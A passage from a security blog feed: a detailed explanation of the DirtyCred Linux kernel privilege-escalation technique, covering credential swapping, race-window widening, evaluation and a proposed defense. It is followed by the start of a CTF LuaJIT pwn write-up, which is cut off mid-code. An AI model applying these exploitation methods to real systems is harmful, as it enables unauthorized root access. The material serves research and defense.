words, because a logic bug stems from broken <strong>logic</strong>, its exploitation is tightly coupled to <strong>the logic of that specific component</strong>. That tight coupling makes such a bug easy to fix, and its impact does not spread very far.</p>
<h3 id="2-Credentials">2. Credentials</h3><p>In Linux, credentials are generally understood as <strong>kernel properties that hold privilege information</strong>. Two kinds are the most familiar (there are more than two in total):</p><ol><li><p><code>struct cred</code>: holds the privilege information of a task, such as its UID and GID. If we can arbitrarily modify the cred structure of a low-privileged process, we can escalate that process to a high privilege level (for example root).</p><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="comment">// include/linux/cred.h</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">cred</span> &#123;</span><br><span class="line"> <span class="type">atomic_t</span>    usage;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> CONFIG_DEBUG_CREDENTIALS</span></span><br><span class="line"> <span class="type">atomic_t</span>    subscribers;    <span class="comment">/* number of processes subscribed */</span></span><br><span class="line"> <span class="type">void</span>        *put_addr;</span><br><span class="line"> <span class="type">unsigned</span> 
   magic;</span><br><span class="line"><span class="meta">#<span class="keyword">define</span> CRED_MAGIC   0x43736564</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> CRED_MAGIC_DEAD  0x44656144</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"> <span class="type">kuid_t</span>      uid;        <span class="comment">/* real UID of the task */</span></span><br><span class="line"> <span class="type">kgid_t</span>      gid;        <span class="comment">/* real GID of the task */</span></span><br><span class="line"> <span class="type">kuid_t</span>      suid;       <span class="comment">/* saved UID of the task */</span></span><br><span class="line"> <span class="type">kgid_t</span>      sgid;       <span class="comment">/* saved GID of the task */</span></span><br><span class="line"> <span class="type">kuid_t</span>      euid;       <span class="comment">/* effective UID of the task */</span></span><br><span class="line"> <span class="type">kgid_t</span>      egid;       <span class="comment">/* effective GID of the task */</span></span><br><span class="line"> <span class="type">kuid_t</span>      fsuid;      <span class="comment">/* UID for VFS ops */</span></span><br><span class="line"> <span class="type">kgid_t</span>      fsgid;      <span class="comment">/* GID for VFS ops */</span></span><br><span class="line"> <span class="type">unsigned</span>    securebits; <span class="comment">/* SUID-less security management */</span></span><br><span class="line"> <span class="type">kernel_cap_t</span>    cap_inheritable; <span class="comment">/* caps our children can inherit */</span></span><br><span class="line"> <span class="type">kernel_cap_t</span>    cap_permitted;   <span class="comment">/* caps we&#x27;re permitted */</span></span><br><span class="line"> <span class="type">kernel_cap_t</span>    cap_effective;   <span class="comment">/* caps we 
can actually use */</span></span><br><span class="line"> <span class="type">kernel_cap_t</span>    cap_bset;        <span class="comment">/* capability bounding set */</span></span><br><span class="line"> <span class="type">kernel_cap_t</span>    cap_ambient;     <span class="comment">/* Ambient capability set */</span></span><br><span class="line">    ...</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p><code>struct file</code>: holds part of a file's permission information, such as whether it was opened for reading or writing. If a low-privileged user can arbitrarily modify a high-privileged file (for example /etc/passwd), that likewise leads to privilege escalation.</p><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="comment">// include/linux/fs.h</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">file</span> &#123;</span><br><span class="line"> ...</span><br><span class="line"> <span class="keyword">struct</span> <span class="title class_">path</span>    f_path;</span><br><span class="line"> <span class="keyword">struct</span> <span class="title class_">inode</span>        *f_inode;   <span class="comment">/* cached value */</span></span><br><span class="line"> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">file_operations</span>    *f_op;</span><br><span class="line"></span><br><span class="line"> <span class="comment">/*</span></span><br><span class="line"><span class="comment">  * Protects f_ep_links, f_flags.</span></span><br><span class="line"><span class="comment">  * Must not be taken from IRQ context.</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line"> <span class="type">spinlock_t</span>          f_lock;</span><br><span class="line"> <span class="keyword">enum</span> <span class="title class_">rw_hint</span>        f_write_hint;</span><br><span class="line"> <span class="type">atomic_long_t</span>       f_count;</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">int</span>        f_flags;</span><br><span class="line"> <span class="type">fmode_t</span>             f_mode;           <span class="comment">// !!: access mode (e.g. opened with O_RDWR)</span></span><br><span class="line"> <span class="keyword">struct</span> <span class="title class_">mutex</span>        f_pos_lock;</span><br><span class="line"> <span class="type">loff_t</span>              f_pos;</span><br><span class="line"> <span class="keyword">struct</span> <span class="title class_">fown_struct</span>  f_owner;</span><br><span class="line"> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">cred</span>   *f_cred;      <span class="comment">// !!: credentials of the opener</span></span><br><span class="line"> <span class="keyword">struct</span> <span class="title class_">file_ra_state</span>   f_ra;</span><br><span class="line"> ...</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>Note that struct file only describes files that <strong>have already been opened</strong>. If a process lacks the permission even to open a file, no corresponding struct file can exist.</p><p>Other privilege information, such as the file's owner, lives in <code>struct inode</code> and is not covered here.</p></li></ol><h3 id="3-Allocator">3. 
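Allocator</h3><p>The Linux kernel allocates most of its memory through the slab allocator, which maintains two main kinds of caches (think of them as two allocation paths with different purposes):</p><ol><li>dedicated cache: memory reserved for <strong>frequently used kernel objects</strong>. Objects in such a cache are kept in an initialized state so that allocation is faster.</li><li>generic cache: general-purpose caches whose object sizes are, in most cases, aligned to powers of two.</li></ol><p>Credential objects such as the cred and file structures are allocated from dedicated caches, whereas most memory-corruption bugs occur in generic caches.</p><p>Run <code>sudo cat /proc/slabinfo</code> in a terminal to inspect the slab allocator. The caches with distinct, object-specific names are dedicated caches:</p><p><img src="/2022/10/dirty-cred/image-20221006192115747.png" alt="image-20221006192115747"></p><p>The ones further down whose names contain kmalloc are generic caches:</p><p><img src="/2022/10/dirty-cred/image-20221006192309397.png" alt="image-20221006192309397"></p><h2 id="三、威胁模型">III. Threat Model</h2><ul><li><p>Attacker</p><ul><li>Has access to the target Linux system as a low-privileged user</li><li>Already has a heap memory-corruption vulnerability</li><li>Intends to use it for local privilege escalation</li></ul><blockquote><p>Any help that hardware could give to exploitation is out of scope.</p></blockquote></li><li><p>Target platform</p><ul><li>Has <strong>all mitigations</strong> enabled (for example KASLR, SMAP, SMEP, CFI, KPTI)</li></ul></li></ul><h2 id="四、面对的挑战">IV. Challenges</h2><p>Let's start with CVE-2021-4154 to show how Dirty Cred works. First, a figure:</p><p><img src="/2022/10/dirty-cred/image-20221006195145289.png" alt="image-20221006195145289"></p><p>The figure already gives a rough picture of the process. The short version: writing to a file performs two steps in order:</p><ol><li>Check the file's permissions (is it writable?)</li><li>Actually write the data to the file</li></ol><p>Suppose we <strong>race</strong> between these two steps. After the permission check succeeds (/tmp/x is writable), we trigger the vulnerability to <strong>free</strong> the original credential structure (here a file structure) and <strong>create</strong> a <strong>high-privileged</strong> credential structure (for example the file structure of <code>/etc/passwd</code>) to <strong>occupy</strong> the freed slot. The pending data is then written to /etc/passwd instead, which gives local privilege escalation.</p><p>This makes the challenges Dirty Cred faces fairly clear:</p><ol><li>How to turn a <strong>memory-corruption vulnerability</strong> into a primitive that can <strong>swap credential objects</strong>.</li><li>How to widen the race window between the file <strong>permission check and the data write</strong>.</li><li>How to create high-privileged credential objects that occupy the slot left by the freed low-privileged credential object.</li></ol><h2 id="五、-置换-credential-object">V. Swapping Credential Objects</h2><p>Common classes of memory-corruption vulnerabilities are:</p><ol><li>Invalid-Write: <strong>Out Of Bound Write</strong> (an out-of-bounds read cannot be used here, since it only leaks data) and <strong>Use after 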
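Free</strong>.</li><li>Invalid-Free: <strong>Double Free</strong></li></ol><p>The following subsections show how each of these bug classes can be used to <strong>replace an unprivileged credential with a privileged one</strong>.</p><h3 id="1-Out-Of-Bound-Write">1.  Out Of Bound Write</h3><p>The short version is in the figure:</p><p><img src="/2022/10/dirty-cred/image-20221006203908551.png" alt="image-20221006203908551"></p><p>This is the usual OOB-write pattern: write past the end of the vulnerable object into a field of the adjacent object, so that a pointer which used to reference a <strong>low-privileged credential structure</strong> now references a <strong>high-privileged credential structure</strong>. The redirection is done by writing zeros to the <strong>two low bytes</strong> of the pointer (0x0000). Zeros are used, rather than some other value, because the attacker wants the pointer to land on <strong>a privileged credential at the start of a page</strong>. The attacker can spray privileged credential objects so that they occupy the first slot of freshly allocated pages, preparing for the pointer overwrite.<br>Pages are aligned to 0x1000 bytes, while zeroing two bytes requires the privileged credential to sit at an address aligned to 0x1<strong>0</strong>000 bytes (only one in sixteen 0x1000-byte pages starts on such a boundary), so the attack may have to be retried, succeeding with a probability of about 1/16.</p><h3 id="2-Use-After-Free">2. Use After Free</h3><p>Exploiting a UAF is much like the CVE-2021-4154 flow described earlier.</p><ol><li>If the UAF happens in a dedicated credential cache, it is enough to free the original unprivileged credential and let a newly created privileged credential object occupy the freed slot. That completes the swap.</li><li>If the UAF happens in a generic cache (the common case), <strong>the UAF must also provide an invalid-write capability</strong>. First free a slot, then occupy it with an exploitable object that contains a credential pointer, and finally use the dangling UAF pointer to overwrite that credential pointer.</li></ol><h3 id="3-Double-Free">3. 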
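Double Free</h3><p>Exploiting a double free is a little more involved. First, the figure:</p><p><img src="/2022/10/dirty-cred/image-20221006220306654.png" alt="image-20221006220306654"></p><p>The flow is roughly:</p><ol><li><p>Allocate a large number of objects in <strong>the cache that holds the vulnerable object</strong>, such that</p><ol><li>the attacker controls when these objects are freed, and</li><li>“a large number” means enough objects to fill at least one page of memory.</li></ol><p>The only purpose is to <strong>control when a given memory page is reclaimed</strong>: once every object on a page has been freed, the now-empty page is returned to the page allocator.</p></li><li><p>Trigger the double-free vulnerability twice so that, in the end, <strong>one freed chunk has two dangling pointers to it</strong>.</p></li><li><p>Free every object on the page that holds the vulnerable object, so that the page is reclaimed and then reused for credential allocation (that is, it becomes part of a dedicated cache).</p></li><li><p>Allocate many credential structures on the page that now belongs to the dedicated credential cache, filling the page (<strong>Figure 3(f)</strong>).</p></li><li><p>The two dangling pointers may not be aligned to a credential object, so one of them has to be spent on a free that opens up a slot the size of one credential object.</p></li><li><p>Allocate a new credential object into that slot. Now <strong>two pointers reference the same credential object</strong>, and the rest of the exploit follows the UAF approach, so it is not repeated here.</p></li></ol><p>An interesting question arises here: if a pointer <strong>originally pointed into a generic cache</strong> and the memory behind it later becomes part of a <strong>dedicated cache</strong>, how is the size determined when we free what we believe is a generic pointer but is actually a dedicated one? Why is the freed size that of a credential object?</p><p>Reading the kfree path of the slab allocator shows that freeing is driven by the address being freed. kfree first looks up the slab_cache structure that the address belongs to and then frees an object of the size recorded there. In other words, an address in a generic cache is freed through the generic-cache path, and an address in a dedicated cache through the dedicated-cache path. This is presumably for convenience, so that chunks from different caches can be freed through the same kfree interface.</p><h2 id="六、延长竞争窗口">VI. Widening the Race Window</h2><p>Dirty Cred has to replace the low-privileged credential with a high-privileged one between <strong>the write-permission check and the actual data write</strong>. The swap takes some time, so widening this race window makes the exploit far more reliable.</p><h3 id="1-有趣的机制">1. Two interesting mechanisms</h3><p>Two interesting mechanisms need introducing first: <strong>Userfaultfd</strong> and <strong>FUSE</strong>. Both <strong>let a user stretch the race window indefinitely</strong>.</p><h4 id="a-Userfaultfd">a. 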
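Userfaultfd</h4><p>In a multithreaded program, userfaultfd lets one thread handle the page faults raised by other threads. When a thread triggers a page fault it is <strong>put to sleep immediately</strong>, while another thread reads the fault event from the userfaultfd and handles it.</p><p>Userfaultfd is widely used when exploiting race conditions. Unfortunately, to curb its abuse in kernel exploits, <strong>unprivileged</strong> userfaultfd has been <strong>disabled by default</strong> since kernel 5.11 (<a href="https://lwn.net/Articles/819834/">LWN: Blocking userfaultfd() kernel-fault handling</a>).</p><blockquote><p>Reference: the Linux manual page (<code>man userfaultfd</code>).</p></blockquote><h4 id="b-FUSE">b. FUSE</h4><p>FUSE is a userspace filesystem framework that lets users implement their own filesystems. A user registers handlers that service file-operation requests, so a handler can run, and stall the kernel, before the file is actually operated on, stretching the window as long as needed.</p><h3 id="2-Userfaultfd-利用方式">2. Exploiting Userfaultfd</h3><p>Before Linux 4.13, the <strong>writev system call</strong> was implemented roughly as follows:</p><p><img src="/2022/10/dirty-cred/image-20221006234319329.png" alt="image-20221006234319329"></p><p>After the permission check has completed, the attacker can trigger a page fault in the call to <code>import_iovec</code> and use userfaultfd to pause kernel execution there.</p><p>Since Linux 4.13, however, the implementation looks like this, with the call to import_iovec moved earlier:</p><p><img src="/2022/10/dirty-cred/image-20221006234539132.png" alt="image-20221006234539132"></p><p>This breaks the approach just described, so another one is needed.</p><p>Linux filesystems are layered, with high-level interfaces calling lower-level functions to do the work, so a file write eventually reaches a function named <code>generic_perform_write</code>. That function deliberately triggers a page fault on the user buffer, which userfaultfd can exploit in the same way:</p><p><img src="/2022/10/dirty-cred/image-20221006235624520.png" alt="image-20221006235624520"></p><h3 id="3-文件系统-lock-的利用方式">3. 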
Exploiting the filesystem lock</h3><p>Take a write on ext4 as an example. Before <code>generic_perform_write</code> is called to do the actual write, the inode must be locked (the <code>inode_lock(inode)</code> call):</p><p><img src="/2022/10/dirty-cred/image-20221007000247163.png" alt="image-20221007000247163"></p><p>If one process first performs a <strong>very large write</strong> to a file, another process writing to the same file has to wait until the inode lock is released. Testing shows that writing 4 GB of data can make the second process wait for tens of seconds (depending on disk performance), so the inode lock can also be used to widen the race window.</p><h2 id="七、分配特权对象">VII. Allocating Privileged Objects</h2><p>Dirty Cred depends on controlling when privileged credential objects are allocated, so controlling that allocation is a key step.</p><p>From <strong>user space</strong>, there are two ways to allocate privileged credentials:</p><ol><li>Run Set-UID programs (for example sudo) many times, or repeatedly spawn privileged daemons (for example sshd), to create privileged cred structures.</li><li>Open privileged files such as <code>/etc/passwd</code> read-only.</li></ol><p>In <strong>kernel space</strong>, when the kernel creates a new kernel thread, the current kernel thread is duplicated and its privileged cred structure is copied along with it. So if there is a reliable way to create kernel threads, Dirty Cred can reliably create privileged cred structures. Two methods achieve this:</p><ol><li><p>Flood the kernel workqueue with tasks so that new kernel threads are created dynamically to run them.</p></li><li><p>Invoke the usermode helper (a mechanism that lets the kernel create user-mode processes). Its most common use is loading kernel modules into kernel space.</p><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="comment">// kernel/kmod.c</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">call_modprobe</span><span class="params">(<span class="type">char</span> *module_name, <span class="type">int</span> wait)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"> <span class="keyword">struct</span> <span class="title class_">subprocess_info</span> *info;</span><br><span class="line"> <span class="type">static</span> <span class="type">char</span> *envp[] = &#123;</span><br><span class="line">     <span class="string">&quot;HOME=/&quot;</span>,</span><br><span class="line">     <span class="string">&quot;TERM=linux&quot;</span>,</span><br><span class="line">     <span class="string">&quot;PATH=/sbin:/usr/sbin:/bin:/usr/bin&quot;</span>,</span><br><span class="line">     <span class="literal">NULL</span></span><br><span class="line"> &#125;;</span><br><span class="line"></span><br><span class="line"> <span class="type">char</span> **argv = <span class="built_in">kmalloc</span>(<span class="built_in">sizeof</span>(<span class="type">char</span> *[<span class="number">5</span>]), GFP_KERNEL);</span><br><span class="line"> <span class="keyword">if</span> (!argv)</span><br><span class="line">     <span class="keyword">goto</span> out;</span><br><span class="line"></span><br><span class="line"> module_name = <span class="built_in">kstrdup</span>(module_name, 
GFP_KERNEL);</span><br><span class="line"> <span class="keyword">if</span> (!module_name)</span><br><span class="line">     <span class="keyword">goto</span> free_argv;</span><br><span class="line"></span><br><span class="line"> argv[<span class="number">0</span>] = modprobe_path;</span><br><span class="line"> argv[<span class="number">1</span>] = <span class="string">&quot;-q&quot;</span>;</span><br><span class="line"> argv[<span class="number">2</span>] = <span class="string">&quot;--&quot;</span>;</span><br><span class="line"> argv[<span class="number">3</span>] = module_name;  <span class="comment">/* check free_modprobe_argv() */</span></span><br><span class="line"> argv[<span class="number">4</span>] = <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// invoke the usermode helper</span></span><br><span class="line"> info = <span class="built_in">call_usermodehelper_setup</span>(modprobe_path, argv, envp, GFP_KERNEL,</span><br><span class="line">                <span class="literal">NULL</span>, free_modprobe_argv, <span class="literal">NULL</span>);</span><br><span class="line"> <span class="keyword">if</span> (!info)</span><br><span class="line">     <span class="keyword">goto</span> free_module_name;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">call_usermodehelper_exec</span>(info, wait | UMH_KILLABLE);</span><br><span class="line"></span><br><span class="line">free_module_name:</span><br><span class="line"> <span class="built_in">kfree</span>(module_name);</span><br><span class="line">free_argv:</span><br><span class="line"> <span class="built_in">kfree</span>(argv);</span><br><span class="line">out:</span><br><span class="line"> <span class="keyword">return</span> -ENOMEM;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>When the kernel <strong>loads a kernel module</strong>, it has to <strong>launch the modprobe 
program from kernel space</strong> in order to <strong>search the standard driver installation paths for the target driver</strong>.</p></li></ol><h2 id="八、评估">VIII. Evaluation</h2><h3 id="1-评估环境">1. Evaluation Environment</h3><p>Linux 5.16.15</p><h3 id="2-可利用的内核对象">2. Exploitable Kernel Objects</h3><p>An exploitable object is one that <strong>contains a credential object</strong> and <strong>whose allocation on the kernel heap can be timed by the attacker</strong>.</p><p><img src="/2022/10/dirty-cred/image-20221007101939000.png" alt="image-20221007101939000"></p><p>The figure above shows that:</p><ol><li><p>Almost every generic cache has <strong>at least two</strong> exploitable objects.</p></li><li><p>The offset of the credential inside the exploitable objects varies widely, which raises Dirty Cred's exploitation success rate.</p><blockquote><p>This matters especially for OOB vulnerabilities, where the offsets that can be overwritten may differ considerably.</p></blockquote></li><li><p>Five exploitable objects <strong>hold their credential at relative offset 0</strong>, which raises Dirty Cred's success rate <strong>when the memory corruption covers only a small range</strong>.</p></li></ol><h3 id="3-满足评估条件的-CVE-漏洞">3. CVEs That Meet the Evaluation Criteria</h3><p>Requirements:</p><ul><li>A Linux kernel vulnerability reported in 2019 or later</li><li>Able to corrupt the Linux kernel heap</li><li>Triggerable without special hardware support</li><li>The corresponding kernel panic can be reproduced</li></ul><p><img src="/2022/10/dirty-cred/image-20221007101924928.png" alt="image-20221007101924928"></p><p>The figure above shows that, with all mitigations enabled, Dirty Cred successfully exploits <strong>16/24</strong> of the vulnerabilities. Specifically:</p><ol><li>Every Double Free vulnerability can be exploited.</li><li>Some OOB cases cannot be exploited. In some of them the OOB write lands in virtual memory rather than kmalloc'ed memory, where no exploitable object is currently available.</li><li>The UAF cases that cannot be exploited fall into two groups: those that only allow a UAF read and no invalid write, and those where the invalid write does not land on the credential field of an exploitable object.</li></ol><h2 id="九、Dirty-Cred-防护">IX. Defending Against Dirty Cred</h2><p>At its core, Dirty Cred works because the kernel isolates memory by <strong>type</strong> rather than by <strong>privilege</strong>.</p><p>The defense is conceptually simple: isolate privileged credentials from unprivileged ones.</p><p>How: use <code>vzalloc/kvfree</code> to allocate and free the memory for privileged credentials in virtual memory, so that privileged and unprivileged objects live in separate memory caches.</p><p>Virtual memory is used for privileged credentials for two reasons:</p><ol><li>With two separate kmalloc'ed memory caches, the kernel's memory reuse mechanism could still merge the pages holding privileged credentials with the pages holding unprivileged ones, which would defeat the isolation.</li><li>The virtual memory region is <strong>dynamically allocated</strong>, <strong>virtually contiguous</strong> kernel memory that lives between VMALLOC_START and VMALLOC_END, so memory in this region never overlaps with the direct-mapped region.</li></ol><blockquote><p>As an aside, here is how memory allocated by kmalloc and vmalloc 
differs:</p><ol><li>Both allocate kernel memory.</li><li>kmalloc guarantees that the memory is <strong>physically contiguous</strong>; vmalloc only guarantees that it is <strong>virtually contiguous</strong> (which requires setting up page tables).</li><li>kmalloc can only allocate limited sizes, while vmalloc can allocate considerably larger ones.</li><li>vmalloc is somewhat slower because it has to set up page tables.</li></ol></blockquote><p>The credential structures to be isolated are:</p><ol><li>struct cred whose UID is <strong>GLOBAL_ROOT_UID</strong> (privileged credentials)</li><li>struct file opened with <strong>write</strong> access (unprivileged credentials)</li></ol><blockquote><p>My guess as to why these two are the ones isolated: structures of these kinds (GLOBAL_ROOT_UID creds and writable files) are created less often than the others (creds with an unprivileged UID and read-only files).</p></blockquote><p>Because the isolation is decided when a credential is created, it becomes meaningless if an unprivileged cred is elevated in place (for example through <code>setuid/cap_setuid</code>). One option is to create a new privileged cred in the virtual memory region whenever <code>alter_cred_subscribers</code> runs, instead of modifying the original cred. This approach depends heavily on how Linux evolves, though: if a future kernel adds another way to modify a cred in place, the defense stops working, so it is left as future work.</p><p>Performance evaluation of the Dirty Cred defense:</p><p><img src="/2022/10/dirty-cred/image-20221007111610551.png" alt="image-20221007111610551"></p><p>Most of the overhead is very small (&lt; 3%) and does not affect normal use of the system. The 10k File Create benchmark, however, shows 7% overhead, because vmalloc is much slower than kmalloc (it has to set up new memory mappings, among other things). The overhead of 10k File Delete is smaller, because the Linux kernel uses RCU to delete files asynchronously.</p><blockquote><p>RCU (read-copy-update) is a <strong>synchronization mechanism</strong> in the Linux kernel.</p></blockquote><p>The results above also show some "slight performance improvements". These are purely experimental noise rather than real gains (even though the benchmarks were repeated several times).</p><h2 id="十、参考链接">X. References</h2><ul><li><a href="https://github.com/Markakd/DirtyCred">Markakd/DirtyCred - github</a></li><li><a href="https://zplin.me/papers/DirtyCred.pdf">DirtyCred: Escalating Privilege in Linux Kernel - ACM CCS 2022</a></li><li><a href="https://www.blackhat.com/us-22/briefings/schedule/#cautious-a-new-exploitation-method-no-pipe-but-as-nasty-as-dirty-pipe-27169">Cautious: A New Exploitation Method! 
No Pipe but as Nasty as Dirty Pipe - Blackhat USA 2022</a></li><li><a href="https://hammertux.github.io/slab-allocator">The Slab Allocator in the Linux kernel - hammertux</a></li><li><a href="https://www.kernel.org/doc/html/latest/filesystems/fuse.html">FUSE - The Linux Kernel documentation</a></li><li><a href="https://www.cnblogs.com/sky-heaven/p/11507094.html">Linux kernel workqueue机制分析【转】 - cnblogs</a></li><li><a href="https://blog.csdn.net/YMY_mine/article/details/81636671">kmalloc()和vmalloc() - CSDN</a></li><li><a href="https://szp2016.github.io/linux/RCU%E6%9C%BA%E5%88%B6/">Linux RCU机制 - szp2016 github page</a></li></ul>]]></content>
    
    
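    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;Dirty Cred is a new Linux &lt;strong&gt;exploitation technique&lt;/strong&gt; inspired by the Dirty Pipe vulnerability. By following the Dirty Cred workflow, the exploitation of other &lt;strong&gt;memory corruption vulnerabilities&lt;/strong&gt; in the &lt;strong&gt;Linux kernel&lt;/strong&gt; can be turned into the exploitation of a &lt;strong&gt;logic bug&lt;/strong&gt;, which &lt;strong&gt;bypasses all current kernel mitigations&lt;/strong&gt; (including CFI, control-flow integrity).&lt;/p&gt;
&lt;p&gt;The core idea of Dirty Cred is to &lt;strong&gt;swap a low-privileged credential object for a high-privileged one&lt;/strong&gt; in order to escalate privileges. The work has been accepted at CCS 2022 and Black Hat USA 2022, and it is a genuinely interesting idea.&lt;/p&gt;</summary>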
    
    
    
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
    <category term="linux" scheme="https://kiprey.github.io/tags/linux/"/>
    
  </entry>
  
  <entry>
    <title>Defcon-30-Quals smuggler&#39;s cove Post-Mortem Notes</title>
    <link href="https://kiprey.github.io/2022/08/defcon30quals_smugglers_cove/"/>
    <id>https://kiprey.github.io/2022/08/defcon30quals_smugglers_cove/</id>
    <published>2022-08-29T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.978Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>These are my post-mortem notes on <code>smuggler's cove</code> from Defcon 30 Quals.</p><p>The challenge is a LuaJIT pwn task.</p><span id="more"></span><h2 id="二、环境配置">II. Environment Setup</h2><p>First, read the version number out of the provided libluajit file:</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220829215234730.png" alt="image-20220829215234730"></p><p>Then download the source, check out that version, and build it:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># download the source</span></span><br><span class="line">git <span class="built_in">clone</span> git@github.com:LuaJIT/LuaJIT.git</span><br><span class="line"><span class="comment"># enter the LuaJIT directory</span></span><br><span class="line"><span class="built_in">cd</span> LuaJIT</span><br><span class="line"><span class="comment"># check out the matching version</span></span><br><span class="line">git checkout v2.1.0-beta3</span><br><span class="line"><span class="comment"># manually edit LuaJIT/src/Makefile so that the build includes debug info</span></span><br><span class="line"><span class="comment"># build</span></span><br><span class="line">make -j `<span class="built_in">nproc</span>`</span><br><span class="line"><span class="comment"># leave the LuaJIT directory</span></span><br><span class="line"><span class="built_in">cd</span> ..</span><br><span class="line"><span class="comment"># compile cove.c and link it against the freshly built 
libluajit.so</span></span><br><span class="line">gcc cove.c -g3 -ggdb3 -o mycove -I LuaJIT/src -L ./LuaJIT/src/ -l luajit</span><br><span class="line"><span class="comment"># symlink the built libluajit under the name libluajit-5.1.so.2</span></span><br><span class="line"><span class="built_in">ln</span> -s /root/cove/LuaJIT/src/libluajit.so /root/cove/LuaJIT/src/libluajit-5.1.so.2</span><br><span class="line"><span class="comment"># set the library path and run</span></span><br><span class="line">LD_LIBRARY_PATH=/root/cove/LuaJIT/src ./mycove</span><br><span class="line"></span><br><span class="line"><span class="comment"># to run the provided binary itself, use this command instead</span></span><br><span class="line">LD_LIBRARY_PATH=. ./cove exp.lua</span><br></pre></td></tr></table></figure><h2 id="三、漏洞点">III. The Vulnerability</h2><p>The challenge ships two main source files. The first is <code>dig_up_the_loot.c</code>; the executable built from it hands out the flag, and it prints the flag only when it is run with specific arguments:</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830110450663.png" alt="image-20220830110450663"></p><p>The other is <code>cove.c</code>, the main source file that calls into the LuaJIT library. It does roughly the following:</p><ul><li><p>Reads in a Lua file, which may be at most 433 bytes long.</p></li><li><p>Configures LuaJIT and <strong>hides the jit global variable</strong>, so that the user cannot set or modify JIT options directly:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">set_jit_settings</span><span class="params">(lua_State* L)</span> 
&#123;</span><br><span class="line">    luaL_dostring(L,</span><br><span class="line">        <span class="string">&quot;jit.opt.start(&#x27;3&#x27;);&quot;</span></span><br><span class="line">        <span class="string">&quot;jit.opt.start(&#x27;hotloop=1&#x27;);&quot;</span></span><br><span class="line">    );</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">init_lua</span><span class="params">(lua_State* L)</span> &#123;</span><br><span class="line">    <span class="comment">// Init JIT lib</span></span><br><span class="line">    lua_pushcfunction(L, luaopen_jit);</span><br><span class="line">    lua_pushstring(L, LUA_JITLIBNAME);</span><br><span class="line">    lua_call(L, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line">    set_jit_settings(L);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//set jit = nil;</span></span><br><span class="line">    lua_pushnil(L);</span><br><span class="line">    lua_setglobal(L, <span class="string">&quot;jit&quot;</span>);</span><br><span class="line">    lua_pop(L, <span class="number">1</span>);</span><br><span class="line">    ...</span><br></pre></td></tr></table></figure></li><li><p>注册 print 函数，用于输出信息：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">print</span><span class="params">(lua_State* L)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (lua_gettop(L) &lt; <span class="number">1</span>) &#123;</span><br><span class="line">      
  <span class="keyword">return</span> luaL_error(L, <span class="string">&quot;expecting at least 1 arguments&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span>* s = lua_tostring(L, <span class="number">1</span>);</span><br><span class="line">    <span class="built_in">puts</span>(s);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>最重要的一个操作。注册 lua 函数 <code>cargo</code>，该函数实际调用 C 函数 <code>debug_jit</code>。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span 